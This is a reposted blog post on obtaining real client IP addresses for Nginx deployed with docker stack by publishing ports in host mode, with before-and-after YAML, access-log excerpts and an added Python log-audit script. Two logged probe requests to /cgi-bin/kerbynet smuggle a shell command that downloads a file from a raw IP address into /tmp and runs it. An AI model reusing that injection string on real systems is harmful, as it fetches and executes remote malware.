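Nginx is deployed with docker stack as a proxy in front of the backend services. When an API is called, the real client IP address cannot be obtained: remote_addr is the container's IP address. The material I consulted describes several approaches (network_mode, ports mapping, firewall...), but none of them is perfect. What finally worked was defining the ports with mode set to host. This approach has a limitation for docker stack deployments: the port is mapped onto the host machine, so one host can run only one replica. Running several replicas on the same host causes a port conflict.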
stack.yaml before the change

# ... omitted
  nginx:
    image: nginx
    volumes:
      - ./nginx/conf.d:/etc/nginx/conf.d
      - ./nginx/nginx.conf:/etc/nginx/nginx.conf
      - ./nginx/ssl:/etc/nginx/ssl
      - ./nginx/log:/var/log/nginx
      - /etc/localtime:/etc/localtime
    ports:
      - 80:80
      - 443:443
# ... omitted
After the change

# ... omitted
  nginx:
    image: nginx
    volumes:
      - ./nginx/conf.d:/etc/nginx/conf.d
      - ./nginx/nginx.conf:/etc/nginx/nginx.conf
      - ./nginx/ssl:/etc/nginx/ssl
      - ./nginx/log:/var/log/nginx
      - /etc/localtime:/etc/localtime
    ports:
      - target: 80
        published: 80
        protocol: tcp
        mode: host
      - target: 443
        published: 443
        protocol: tcp
        mode: host
# ... omitted
Logs:

// Before the change
10.0.0.2 [13/Oct/2020:00:08:33 +0000] "GET / HTTP/1.1" 400 85 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
10.0.0.2 [13/Oct/2020:00:52:48 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 400 74 "-" "-"
10.0.0.2 [13/Oct/2020:00:52:48 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 400 74 "-" "-"

// After the change
193.27.228.27 [13/Oct/2020:01:15:18 +0000] "POST /api/jsonws/invoke HTTP/1.1" 400 85 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
112.255.82.99 [13/Oct/2020:01:16:22 +0000] "GET /news/list?pageNum=1&pageSize=10 HTTP/1.1" 200 449 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0"
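As an added example (not part of the original post), the Python code below parses log lines in the format shown above and separates entries whose remote_addr is only an internal address from entries that carry a routable client address, which is a quick check that the host-mode change took effect and that probe requests can be attributed. The function names and the broken sample line are assumptions made for illustration; the two valid sample lines are abridged from the log excerpt above.

```python
import ipaddress
import re

# Log format used on this page:
# remote_addr [time] "request" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<addr>\S+) \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "[^"]*" "[^"]*"$'
)

# Two entries abridged from the excerpt above, plus one constructed broken line.
SAMPLE = [
    '10.0.0.2 [13/Oct/2020:00:08:33 +0000] "GET / HTTP/1.1" 400 85 "-" "Mozilla/5.0"',
    '112.255.82.99 [13/Oct/2020:01:16:22 +0000] "GET /news/list?pageNum=1&pageSize=10 HTTP/1.1" 200 449 "-" "Mozilla/5.0"',
    'truncated line without the expected fields',
]


def audit(lines):
    """Sort entries by whether remote_addr is a routable client address."""
    report = {"client": [], "masked": [], "unparsed": []}
    for line in lines:
        m = LINE_RE.match(line.strip())
        try:
            addr = ipaddress.ip_address(m["addr"]) if m else None
        except ValueError:
            addr = None
        if addr is None:
            report["unparsed"].append(line)
            continue
        # Container and overlay addresses are not globally routable.
        bucket = "client" if addr.is_global else "masked"
        report[bucket].append((str(addr), m["time"], m["request"], int(m["status"])))
    return report


def masked_ratio(report):
    """Fraction of parsed entries whose source address was hidden by the proxy path."""
    parsed = len(report["client"]) + len(report["masked"])
    return len(report["masked"]) / parsed if parsed else 0.0


if __name__ == "__main__":
    result = audit(SAMPLE)
    for addr, when, request, status in result["masked"]:
        print(f"masked source {addr} at {when}: {request!r} -> {status}")
    print(f"masked ratio: {masked_ratio(result):.0%}")
```

A masked ratio that stays above zero after the redeploy means some requests still reach Nginx without their original source address.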
Reposted from: http://yspef.baihongyu.com/